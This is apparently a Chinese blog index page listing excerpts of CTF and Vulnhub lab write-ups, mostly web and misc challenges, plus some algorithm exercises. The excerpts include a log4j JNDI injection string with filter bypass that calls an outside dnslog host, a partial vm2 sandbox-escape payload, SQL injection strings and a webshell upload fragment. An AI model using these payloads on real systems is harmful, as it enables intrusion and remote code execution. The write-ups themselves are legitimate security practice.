自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(159)
  • 收藏
  • 关注

原创 [长安杯]web-shiro复现

长安杯-shiro?复现浏览器显示是springboot框架登录伪造shiro,关键词为remeber-meshiro直接打,打不进去springboot还可以写log4j漏洞,测试一下jndi被过滤了进行绕过${${::-j}ndi:rmi://py2hu7.ceye.io/exp}成功接收到dnslog信息。构建jndi反弹shell,这里反弹shell的命令需要bypass一下在这里插入代码片反弹的有点慢,但是可以成功反弹shell并拿取flag。...

2022-01-12 14:56:30 2227

原创 BUUCTF-[MRCTF2020]Ezaudit

[MRCTF2020]Ezaudit扫描目录,发现www.zip可以下载到源码。进行部分审计,只有当username,password和private_key全部正确时,才会获取flag。对于username和password,由于是sql查询,可以万能密码进行绕过,剩下的问题是获取private_key。给出了获取public_key和private_key的函数,并且mt_rand函数是伪随机函数,只要获取种子值就都不是问题。接下来我们要根据public_key反推出种子值。首先转换字

2021-11-04 19:56:23 3290

原创 BUUCTF-[HFCTF2020]JustEscape

[HFCTF2020]JustEscape题目说真的不是PHP吗?十有八九不是,猜测可能是Java,结果是js。用Error().stack,看一下报错信息。报错显示是vm.js,考的vm沙箱逃逸。POC参考:https://github.com/patriksimek/vm2/issues/225payload1:(function (){ TypeError[`${`${`prototyp`}e`}`][`${`${`get_pro`}cess`}`] = f=>f[`$

2021-11-04 14:28:58 512

原创 BUUCTF-[b01lers2020]Life on Mars

[b01lers2020]Life on Mars审视了一下页面的功能,这几个功能键只能改变页面显示,连跳转都没有。扫描了一下,没有其他任何页面。这是猜想是不是框架漏洞。利用了Bootstrap的漏洞也没用,只能抓包看一下,不抓不知道,一抓吓一跳找到了sql注入的注入点,测试了一下,似乎存在waf,不能有空格,于是常规用/**/替换空格。爆破数据库名union/**/select/**/1,group_concat(SCHEMA_NAME)/**/from/**/information_s

2021-11-04 14:07:27 2968

原创 BUUCTF-[SCTF2019]Flag Shop

[SCTF2019]Flag Shop简单看一下几个按钮的作用,buy flag是购买flag的按钮,但是当前的JinKela不够买不起,reset是重置按钮,work是工作按钮,可以赚取JinKela,但是每次只能赚取一小部分。(除非你足够闲,一直点到所需的数量然后购买flag)这三个按钮干不成大事,目录扫描,扫到robots.txt查看页面备份文件这里可以看到源码~~(本菜狗没学过Ruby,哭了)~~问题不大,看到了JWT,先抓个包看一下,找到了jkl的位置,但是缺少密钥对其进行加

2021-11-04 10:56:49 4490 1

原创 BUUCTF-[红明谷CTF 2021]write_shell

[红明谷CTF 2021]write_shell源码放出来了,直接进行代码审计:从action出发,有两个功能,一是执行pwd,功能是显示当前目录,二是上传upload,通过data变量执行get传参,这里设置了一个waf,对data的内容进行了过滤。首先进行pwd操作,查看当前目录:接下来构建shell,这里过滤了php,所以使用短标签<?=?>,过滤了空格,使用\t替换,过滤了eval,使用`执行命令打开根目录下所有文件:/?action=upload&data=&lt

2021-11-02 16:41:38 549

原创 BUUCTF-[NCTF2019]SQLi

[NCTF2019]SQLi进入页面,sql语句直接被甩在脸上,尝试万能密码登录:这里有waf,先fuzzy一下:过滤的东西有点多(真不愧sql语句能直接甩脸)在robots.txt文件中有提示再进入hint.txt这里看到了黑名单,并且说要让我们查找admin的密码,但是admin在黑名单中,只能进行正则匹配了。但是想在框框内进行正则不可能,单引号注释符全被过滤了。sqlquery : select * from users where username='' and pass

2021-11-02 13:25:22 337

原创 NC16589

NC16589解析解析这一题我的第一反应是队列,再开一个数组用于查找是否已经存过,数组最大不超过1000,很小,所以可以的。我用了两种方法,一种是队列,一种是数组。//队列#include<bits/stdc++.h>using namespace std;//记录是否被存储 int mp[1005];queue<int> q;int m,n;int main(){ cin>>m>>n; //记录查找次数 int res=0;

2021-09-28 10:17:10 114

原创 [NOIP2006]明明的随机数

[NOIP2006]明明的随机数解析解析这题方法很多,我采取了先排序再筛重复,将不重复的数存在新的数组中,这里过筛的指针从1开始,当前数与前一个数相等的话就跳过,不一样的话就保存在另一个数组中。#include<bits/stdc++.h>using namespace std;#define N 105int n;int mp[N];int tmp[N];int main(){ int length=1; cin>>n; for(int i=0;i&

2021-09-27 22:38:09 122

原创 NC16622

NC16622题目描述解析题目描述一元n次多项式可用如下的表达式表示:f (x) = anxn+ an-1xn-1 + … + a1x + a0,a0≠0其中,aixi 称为i 次项,ai 称为i次项的系数。给出一个一元多项式各项的次数和系数,请按照如下规定的格式要求输出该多项式:多项式中自变量为x,从左到右按照次数递减顺序给出多项式。多项式中只包含系数不为0的项。如果多项式n次项系数为正,则多项式开头不出现“+”号,如果多项式 n 次项系数为负,则多项式以“-”号开头。对于

2021-09-27 22:27:12 150

原创 NC16644

NC16644题目描述解析题目描述在初赛普及组的“阅读程序写结果”的问题中,我们曾给出一个字符串展开的例子:如果在输入的字符串中,含有类似于“d-h”或“4-8”的子串,我们就把它当作一种简写,输出时,用连续递增的字母或数字串替代其中的减号,即,将上面两个子串分别输出为“defgh”和“45678”。在本题中,我们通过增加一些参数的设置,使字符串的展开更为灵活。具体约定如下:(1)遇到下面的情况需要做字符串的展开:在输入的字符串中,出现了减号“-”,减号两侧同为小写字母或同为数字,且按照ASCII码的

2021-09-26 16:31:16 248

原创 Vulnhub实战:zico2

描述:收集信息:靶机开放了三个端口,ssh,http,rpc。先进入80端口进行查看。发现个文件包含漏洞。尝试读取passwd文件成功读取后,进行目录扫描。找到了几个目录,看着dbadmin像是后台数据库,查看一下尝试了几个弱密码,是admin查看数据库发现两个用户信息,一个是root,一个是zico,md5爆破密码。尝试ssh登录,发现密码不对,返回去找了个phpliteadmin的漏洞。按照上述步骤,创建数据库,创建表,将一句话木马写入。成功写入,

2021-08-12 20:39:12 282

原创 梦之光芒/黑客小游戏

梦之光芒第零关查看源码,发现链接标签。点击就进入了第二关第一关查看源码,发现是一个前端密码验证。密码是两个空格第二关想查看源码,发现无法右击,所以直接使用view-source。程序执行一下,得出a的值。最后floor函数是取证,所以密码是424178第三关查看源码,输入要等于那一段编码,直接F12运行一下。第四关成功进入第四关后又返回了第三关,抓个包。两块js编码部分,还是使用控制台。所以密码是3BHE1。使用火狐浏览器,进入第五关后按ESC

2021-08-11 19:32:25 998 4

原创 Vulnhub实战-MoneyBox

描述:主机探测:端口扫描:nmap -T4 -A -v 192.168.199.134靶机开放了4个端口,21,22,80,其中21端口可以无验证登录。使用msf扫描一下,是否可以匿名登录。可以匿名登录,使用ftp登录。登录成功后,发现有一个名为trytofind的图片,先下载下来。没发现图片有什么特别之处。进入http端口看一下 。即使查看源码也没有任何提示。先查看一下robots协议。扫描一下目录。显示/blogs/index.html下有内容。提示

2021-08-11 15:22:48 448

原创 Vulnhub实战-Forensics

Vulnhub实战-Forensics下载链接描述信息收集访问网页。(张狂) 点击进去是一张动图。查看主页源码。发现有个images目录。进去查看一下。全部下载下来查看一下。Flag:1 {bc02d4ffbeeab9f57c5e03de1098ff31}用dirb扫描txt文件后缀。将两个文件都下载下来。flag.zip文件时加密的,igolder是一个目录,该目录下还有一个clue.txt文件。clue.txt文件是一个加密文件,使用在线工具解密。P

2021-07-18 16:56:45 351 1

原创 Vulnhub入门实战-Wakanda

下载链接描述:1.探测主机的IP地址2.使用nmap查看靶机开放端口。开放了4个端口,老样子先从http下手。3.进去发现没什么可以点的,于是进行目录扫描。状态码都是200,但是size为0,所以返回的都是空页面。查看主页源代码,发现一个注释。猜测存在本地文件包含漏洞,抓包看一下。成功读取主页源码,并发现密码,猜测下一步根据账号和密码进行ssh登录。账户猜测就是主页的namemamadou,passwdNiamey4Ever227!!!这里的使用凭证是有效的,但是还

2021-07-14 15:03:05 2285 1

原创 Vulnhub入门实战 4-DC:4

Vulnhub入门实战 4-DC:4首先探测靶机IP地址。找到IP地址后进行端口扫描。该靶机开放了22和80端口。所以可以通过浏览器访问。根据页面提示,让我们用admin账户登录,由于不知道账户密码,所以在这使用burp进行爆破。...

2021-06-20 16:48:05 154

原创 Vulnhub入门实战3-DC:3

Vulnhub入门实战3-DC:3VMware镜像下载链接首先探寻一下靶机的ip地址。使用nmap进行端口扫描。只开通了一个80端口,通过浏览器进行访问。收集到该网站的CMS使用的是joomla。使用joomscan探测版本号。joomscan --url http://192.168.43.219:80/确定版本号后,使用searchsploit搜索该版本的漏洞。该版本存在sql注入漏洞。cp /usr/share/exploitdb/exploits/php/webapps

2021-06-19 16:11:05 135

原创 Vulnhub-Me and my girlfriend

Me and my girlfriend先通过arp-scan搜寻一下靶机的IP地址。找到靶机的IP地址,nmap进行端口扫描。靶机开通了apache服务,所以可以通过网页进行访问。进一步查看源码。提示通过X-forwarded-for进行本地访问。这里借助一下firefox的一个叫ModHeader的插件。配置好后刷新一下就可以出现页面。由于存在登录页面,所以猜测还存在其他页面,先利用dirb进行目录扫描。在/config/和/misc/目录下存在文件,查看一下robots协

2021-06-16 23:13:53 210

原创 Vulnhub入门实战2-DC:2

DC:2下载链接启动靶机。1.探索存活主机的ip地址。2.收集开放端口的信息。开放了80端口,可以通过浏览器访问。在主页找到了第一个flag。你通常的词表可能不起作用,所以相反,也许你只需要保持冷静。密码越多越好,但有时您无法全部赢取。以一个人身份登录以查看下一个标志。如果找不到,请以另一个身份登录。这里提示我们需要爆破登录。3.扫描网站目录这里使用nikto工具。nikto -host http://dc-2/扫描到登录页面。使用wpscan扫描,获取登

2021-06-10 16:39:16 141

原创 Vulnhub入门实战1-DC:1

Vulnhub入门实战1-DC:1DC:1下载链接(我这里使用的是vm,渗透工具使用的是kali2019)下载得到的ova文件直接使用vm导入即可。这里我使用的是桥接模式。靶机进入登录页面就算开启了。1.使用arp探索存活主机,找到靶机的ip地址。找到靶机的ip地址为192.168.199.1792.使用nmap进行端口扫描(信息收集)。参数说明:-sV:版本探测-p-:扫描全部端口根据扫描结果开启了22,80,111,可以进行页面访问。百度了一下drupal,发现dru

2021-06-09 16:25:45 733

原创 BUU-MISC-[*CTF2019]otaku

[*CTF2019]otaku第一层是个伪加密,修改加密位即可解压。第二层加密是明文加密,将文档中隐写的部分转换成GBK编码之后使用明文破解。(提供一段转换python脚本)# -*- coding:GBK -*-f = open('data.txt','w')s = "Hello everyone, I am Gilbert. Everyone thought that I was killed, but actually I survived. Now that I have no cas

2021-06-02 21:19:09 1344

原创 BUU-MISC-hashcat

标题问是什么文件格式,16进制看文件头没看出来,binwalk分析一下是xml文件,修改后缀为ppt。结果ppt是加密的。使用Accent OFFICE Password Recovery进行解密。密码是9919打开后第7页和其他页面不一样,全选修改颜色即可看到flag。...

2021-06-02 17:57:42 412

原创 BMZCTF-MISC-penpig

penpig猪圈密码,查找对照表即可得到flag。flag{yyyyy_ywww@}

2021-05-30 09:21:17 220

原创 BUU-MISC-[WUSTCTF2020]spaceclub

[WUSTCTF2020]spaceclub一开始打开txt文件,啥也没有,直接ctrl+a,全选发现了些端倪,一开始以为是摩斯电码,但是单个字符长度全是一样的。后来发现是二进制,长的是1,短的是0。011101110110001101110100011001100011001000110000001100100011000001111011011010000011001101110010011001010101111100110001011100110101111101111001001100000

2021-05-27 19:51:25 461

原创 BUU-MISC-[UTCTF2020]basic-forensics

[UTCTF2020]basic-forensics给了个jpeg的后缀,但是文本编辑器打开是文字,直接全局搜索flag。flag{fil3_ext3nsi0ns_4r3nt_r34l}

2021-05-27 19:41:26 1347

原创 BUU-MISC-[MRCTF2020]Unravel!!

[MRCTF2020]Unravel!!先看.wav文件,标题提示文件末尾有东西。找到了个key。key=U2FsdGVkX1/nSQN+hoHL8OwV9iJB/mSdKk5dmusulz4=binwalk分析图片。根据提示,是aes加密,密钥是Tokyo。得到加密的压缩包的密码。silenteye解密一下就可以得到flag。...

2021-05-27 19:35:37 712

原创 BUU-MISC-[ACTF新生赛2020]明文攻击

[ACTF新生赛2020]明文攻击得到一张图片和一个加密的压缩包。binwalk分析一下图片。发现图片是以zip文件结尾,但是分解不出来。查看16进制码。补充zip文件头,并以zip格式保存。得到flag.txt,和加密压缩包中有相同的内容,所以使用明文爆破。常规爆破即可。flag{3te9_nbb_ahh8}...

2021-05-27 19:04:19 2220 2

原创 BUU-MISC-[UTCTF2020]fileheader

[UTCTF2020]fileheader16进制打开缺少,很明显缺少文件头。根据标题,猜测是png文件。图片中由flag。flag{3lit3_h4ck3r}

2021-05-27 16:32:42 516

原创 BUU-MISC-[BSidesSF2019]zippy

[BSidesSF2019]zippy追踪了一下tcp流,发现流量包中就是在解压一个压缩包。密码是:supercomplexpasswordbinwalk分解一下,得到加密的压缩包。解压即可得到flag。

2021-05-27 16:21:37 779

原创 BUU-MISC-[MRCTF2020]Hello_misc

[MRCTF2020]Hello_ misczsteg分析图片,发现其中包含一个zip文件。用binbwalk分解出来。得到一个加密的压缩包。stegsolve分析图片,通过red通道,发现又含另一张图片。得到压缩包的密码。得到一个全是数字的txt文本,借助网上的脚本分析一下。with open('out.txt') as a_file: content = [x.strip() for x in a_file.readlines()]bins = []for i in co

2021-05-27 16:14:15 637

原创 [安洵杯 2019]easy misc

[安洵杯 2019]easy misc三样东西,大致看了一看,还是决定先从压缩包下手,因为有提示。算出前面等于7,以为是7和后面的字符串,结果是七位数字爆破加字符串。解压得到一张密码表。图片查看16进制码没什么特别的,使用binwalk分析一下。binwalk分解不出来,foremost分解出两张图片。可能是水印。盲水印工具图片提示在11.txt文件下。import refile = open('C:/Users/LENOVO/Downloads/attachment/r

2021-05-27 12:52:54 817 2

原创 BUU-MISC-[MRCTF2020]不眠之夜

[MRCTF2020]不眠之夜看了眼压缩包,应该是要拼凑图片。使用montage和gaps

2021-05-26 17:41:09 1572

原创 BUU-MISC-[SUCTF2018]followme

[SUCTF2018]followme大致看了一下流量包的内容,似乎是在爆破数据库。导出http内容。尝试直接搜索与flag相关的内容。

2021-05-25 19:16:17 349

原创 BUU-MISC-[UTCTF2020]docx

[UTCTF2020]docx看名字以为是文档隐写,但是查看16进制码时,发现时zip文件头,修改文件后缀名。随便找一找,flag以图片形式放在/word/media/文件夹下。

2021-05-25 18:56:55 284

原创 BMZCTF-WEB-simple_pop

simple_popphp代码审计:<?php $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the beijing")){ echo "<br><h1>".file_get_contents($text,'r')."&

2021-05-24 20:01:42 298

原创 BMZCTF-WEB-SCTF 2018_Simple PHP Web

SCTF 2018_Simple PHP Web看到url很容易想到文件读取漏洞。尝试利用php伪协议读取/flag文件。base64解码得到flag。

2021-05-24 19:41:21 224

原创 BMZCTF-WEB-easy_exec

easy_exec主页显示nofile。尝试使用dirsearch扫描一下。扫描发现两个文件。查看de.php。显示着一段php代码。<?phphighlight_file(__FILE__);$comm1 = $_GET['comm1'];$comm2 = $_GET['comm2'];if(preg_match("/\'|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|m

2021-05-24 15:17:10 289

原创 BUU-WEB-[HITCON 2017]SSRFme

[HITCON 2017]SSRFme<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REMOTE_ADDR"]; $

2021-05-24 15:09:42 218

原创 BUU-MISC-[WUSTCTF2020]爬

[WUSTCTF2020]爬查看了一下,看样子是个pdf文件,修改一下后缀名。删掉上面那层图片,会发现底下还有一张图片。16进制转字符串。得到flag。

2021-05-22 19:51:30 305

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除